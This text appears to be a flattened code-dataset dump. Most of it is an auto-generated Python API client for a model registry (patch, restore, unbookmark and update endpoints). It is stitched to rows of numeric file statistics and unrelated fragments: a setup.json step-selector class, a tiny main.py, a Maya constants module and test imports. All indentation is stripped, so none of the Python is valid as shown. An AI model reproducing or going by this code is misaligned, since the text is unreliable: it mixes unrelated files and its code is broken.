)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_model_version`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `patch_model_version`") # noqa: E501
# verify the required parameter 'version_name' is set
if self.api_client.client_side_validation and ('version_name' not in local_var_params or # noqa: E501
local_var_params['version_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `version_name` when calling `patch_model_version`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
if 'version_name' in local_var_params:
path_params['version.name'] = local_var_params['version_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/versions/{version.name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
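# Illustrative usage (a sketch; `api`, `owner`, `model` and `version_body` are
# assumed to exist, and "my-model:v1" is a hypothetical value in the documented
# name[:version] form):
#
#     version = api.patch_model_version(owner, model, "my-model:v1", version_body)
#
#     thread = api.patch_model_version(owner, model, "my-model:v1", version_body,
#                                      async_req=True)
#     version = thread.get()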
def restore_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Restore registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.restore_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.restore_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def restore_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Restore registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.restore_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method restore_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `restore_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `restore_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/restore', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unbookmark_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Unbookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unbookmark_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unbookmark_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def unbookmark_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Unbookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unbookmark_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unbookmark_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `unbookmark_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `unbookmark_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/unbookmark', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
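# Illustrative usage of the body-less endpoints above (a sketch; both calls
# return None on success, so only the side effect matters):
#
#     api.restore_model_registry(owner, name)
#     api.unbookmark_model_registry(owner, name)
#
#     # the with_http_info variants still expose the status code and headers:
#     _, status, headers = api.unbookmark_model_registry_with_http_info(owner, name)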
def update_model_registry(self, owner, model_name, body, **kwargs): # noqa: E501
"""Update registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Component name; should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_model_registry_with_http_info(owner, model_name, body, **kwargs) # noqa: E501
def update_model_registry_with_http_info(self, owner, model_name, body, **kwargs): # noqa: E501
"""Update registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry_with_http_info(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Component name; should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_model_registry`") # noqa: E501
# verify the required parameter 'model_name' is set
if self.api_client.client_side_validation and ('model_name' not in local_var_params or # noqa: E501
local_var_params['model_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model_name` when calling `update_model_registry`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model_name' in local_var_params:
path_params['model.name'] = local_var_params['model_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model.name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_model_registry_settings(self, owner, model, body, **kwargs): # noqa: E501
"""Update registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry_settings(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistrySettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_model_registry_settings_with_http_info(owner, model, body, **kwargs) # noqa: E501
def update_model_registry_settings_with_http_info(self, owner, model, body, **kwargs): # noqa: E501
"""Update registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_registry_settings_with_http_info(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistrySettings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_model_registry_settings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_model_registry_settings`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `update_model_registry_settings`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_model_registry_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/settings', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistrySettings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
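# Illustrative usage of the lower-level options documented above (a sketch;
# `api`, `owner`, `model` and `settings_body` are assumed to exist):
#
#     # _preload_content=False returns the raw urllib3.HTTPResponse instead of
#     # a deserialized V1ModelRegistrySettings:
#     raw = api.update_model_registry_settings(owner, model, settings_body,
#                                              _preload_content=False)
#     payload = raw.data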
def update_model_version(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Update model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_version(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Component name; should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_model_version_with_http_info(owner, model, version_name, body, **kwargs) # noqa: E501
def update_model_version_with_http_info(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Update model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_version_with_http_info(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Component name; should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'version_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_model_version`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `update_model_version`") # noqa: E501
# verify the required parameter 'version_name' is set
if self.api_client.client_side_validation and ('version_name' not in local_var_params or # noqa: E501
local_var_params['version_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `version_name` when calling `update_model_version`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
if 'version_name' in local_var_params:
path_params['version.name'] = local_var_params['version_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/versions/{version.name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
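# Illustrative usage of the timeout options documented above (a sketch; `api`,
# `owner`, `model` and `version_body` are assumed to exist, and "my-model:v1"
# is a hypothetical version name):
#
#     # a single number is the total request timeout in seconds
#     api.update_model_version(owner, model, "my-model:v1", version_body,
#                              _request_timeout=30)
#
#     # a (connection, read) tuple sets the two timeouts separately
#     api.update_model_version(owner, model, "my-model:v1", version_body,
#                              _request_timeout=(3.05, 27))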
| 47.726227
| 133
| 0.59181
| 17,091
| 153,583
| 5.083319
| 0.016032
| 0.050553
| 0.080733
| 0.026335
| 0.985393
| 0.984772
| 0.983391
| 0.980997
| 0.977567
| 0.977049
| 0
| 0.016612
| 0.33171
| 153,583
| 3,217
| 134
| 47.741063
| 0.829849
| 0.420502
| 0
| 0.805211
| 0
| 0
| 0.185556
| 0.056749
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030397
| false
| 0
| 0.003102
| 0
| 0.063896
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0b52234776b29c7739ac5fde733c4560a788d3f
| 2,118
|
py
|
Python
|
bin/steps.py
|
ynohat/cli-onboard
|
af2a02977b273b760e6864f3841d3ca6c0122549
|
[
"Apache-2.0"
] | 2
|
2020-08-18T08:44:26.000Z
|
2022-01-25T09:22:32.000Z
|
bin/steps.py
|
ynohat/cli-onboard
|
af2a02977b273b760e6864f3841d3ca6c0122549
|
[
"Apache-2.0"
] | 7
|
2020-07-14T18:12:14.000Z
|
2021-09-27T15:08:29.000Z
|
bin/steps.py
|
ynohat/cli-onboard
|
af2a02977b273b760e6864f3841d3ca6c0122549
|
[
"Apache-2.0"
] | 3
|
2020-11-29T12:37:16.000Z
|
2021-09-20T12:51:37.000Z
|
class executionSteps(object):
    # This class determines which execution steps to run based on setup.json values.
    def doCreateNewCpCode(self, setup_json_content):
        return setup_json_content['property_info']['default_cpcode']['create_new_cpcode'] is True
    def doPropertyActivateStaging(self, setup_json_content):
        return setup_json_content['activate_property_staging'] is True
    def doPropertyActivateProduction(self, setup_json_content):
        return setup_json_content['activate_property_production'] is True
    def doWafAddSelectedHosts(self, setup_json_content):
        # The 'update_waf_info' section is optional, so guard against its absence.
        if 'update_waf_info' in setup_json_content:
            return setup_json_content['update_waf_info']['add_selected_host'] is True
        return False
    def doWafUpdateMatchTarget(self, setup_json_content):
        if 'update_waf_info' in setup_json_content:
            return setup_json_content['update_waf_info']['update_match_target'] is True
        return False
    def doWafActivateStaging(self, setup_json_content):
        return setup_json_content['activate_waf_policy_staging'] is True
    def doWafActivateProduction(self, setup_json_content):
        return setup_json_content['activate_waf_policy_production'] is True
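# Illustrative usage (a sketch; the 'setup.json' path and the surrounding CLI
# wiring are assumptions, not part of this module):
#
#     import json
#
#     with open('setup.json') as f:
#         setup_json_content = json.load(f)
#
#     steps = executionSteps()
#     if steps.doCreateNewCpCode(setup_json_content):
#         print('A new CP code will be created')
#     if steps.doPropertyActivateStaging(setup_json_content):
#         print('The property will be activated on staging')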
| 33.619048
| 94
| 0.641643
| 235
| 2,118
| 5.468085
| 0.204255
| 0.147082
| 0.249027
| 0.154086
| 0.811673
| 0.811673
| 0.811673
| 0.811673
| 0.753307
| 0.689494
| 0
| 0
| 0.298395
| 2,118
| 62
| 95
| 34.16129
| 0.864738
| 0.033994
| 0
| 0.788462
| 0
| 0
| 0.154523
| 0.05379
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173077
| false
| 0
| 0
| 0
| 0.576923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
e0bca019ee3625793e7aaea5172686754ab5d98c
| 42
|
py
|
Python
|
books/tech/py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_24-modules_packs/27-file_dir_priorities-04/main.py
|
ordinary-developer/education
|
1b1f40dacab873b28ee01dfa33a9bd3ec4cfed58
|
[
"MIT"
] | null | null | null |
books/tech/py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_24-modules_packs/27-file_dir_priorities-04/main.py
|
ordinary-developer/education
|
1b1f40dacab873b28ee01dfa33a9bd3ec4cfed58
|
[
"MIT"
] | null | null | null |
books/tech/py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_24-modules_packs/27-file_dir_priorities-04/main.py
|
ordinary-developer/education
|
1b1f40dacab873b28ee01dfa33a9bd3ec4cfed58
|
[
"MIT"
] | null | null | null |
import sub
print(sub)
print(sub.__path__)
| 10.5
| 19
| 0.785714
| 7
| 42
| 4.142857
| 0.571429
| 0.551724
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 3
| 20
| 14
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
e0e071760e3058bfa6882af8624640f0ccbcb344
| 856
|
py
|
Python
|
python/cgp_maya_utils/constants/__init__.py
|
cgpilou/cgp_maya_utils
|
fa839233da18931f18d11ebe6d542664e6515328
|
[
"MIT"
] | 2
|
2021-01-28T20:22:33.000Z
|
2021-08-25T10:56:25.000Z
|
python/cgp_maya_utils/constants/__init__.py
|
cgpilou/cgp_maya_utils
|
fa839233da18931f18d11ebe6d542664e6515328
|
[
"MIT"
] | null | null | null |
python/cgp_maya_utils/constants/__init__.py
|
cgpilou/cgp_maya_utils
|
fa839233da18931f18d11ebe6d542664e6515328
|
[
"MIT"
] | null | null | null |
"""
constants used to manipulate maya data
"""
# local imports
from ._constants import (AttributeType,
ComponentType,
Environment,
GeometryData,
InfluenceAssociation,
NodeType,
RotateOrder,
Solver,
SurfaceAssociation,
TangentType,
Transform,
WorldUpType)
__all__ = ['AttributeType',
'ComponentType',
'Environment',
'GeometryData',
'InfluenceAssociation',
'NodeType',
'RotateOrder',
'Solver',
'SurfaceAssociation',
'TangentType',
'Transform',
'WorldUpType']
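# Illustrative usage (a sketch; only the names re-exported above are assumed):
#
#     from cgp_maya_utils.constants import AttributeType, NodeType
#
#     # the constants can then be referenced wherever maya data is manipulated,
#     # e.g. AttributeType.<member> or NodeType.<member>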
| 26.75
| 46
| 0.418224
| 36
| 856
| 9.805556
| 0.638889
| 0.147309
| 0.209632
| 0.27762
| 0.810198
| 0.810198
| 0.810198
| 0.810198
| 0.810198
| 0.810198
| 0
| 0
| 0.51285
| 856
| 31
| 47
| 27.612903
| 0.846523
| 0.061916
| 0
| 0
| 0
| 0
| 0.179874
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e0fe8fea7204265debda90348c2e5451e72f2a79
| 13,901
|
py
|
Python
|
pytelemetrycli/test/test_cli.py
|
Overdrivr/pytelemetry-cli
|
8969ab7515341b9821ba70bab93d4db9c6b7ccf5
|
[
"MIT"
] | 17
|
2016-02-10T14:50:36.000Z
|
2022-02-25T03:35:15.000Z
|
pytelemetrycli/test/test_cli.py
|
Overdrivr/pytelemetry-cli
|
8969ab7515341b9821ba70bab93d4db9c6b7ccf5
|
[
"MIT"
] | 39
|
2016-02-06T09:07:43.000Z
|
2017-09-09T14:58:58.000Z
|
pytelemetrycli/test/test_cli.py
|
Overdrivr/pytelemetry-cli
|
8969ab7515341b9821ba70bab93d4db9c6b7ccf5
|
[
"MIT"
] | 8
|
2016-03-13T16:17:52.000Z
|
2021-03-12T17:10:55.000Z
|
from pytelemetrycli.cli import Application
import pytest
from unittest.mock import MagicMock
import cmd
import io
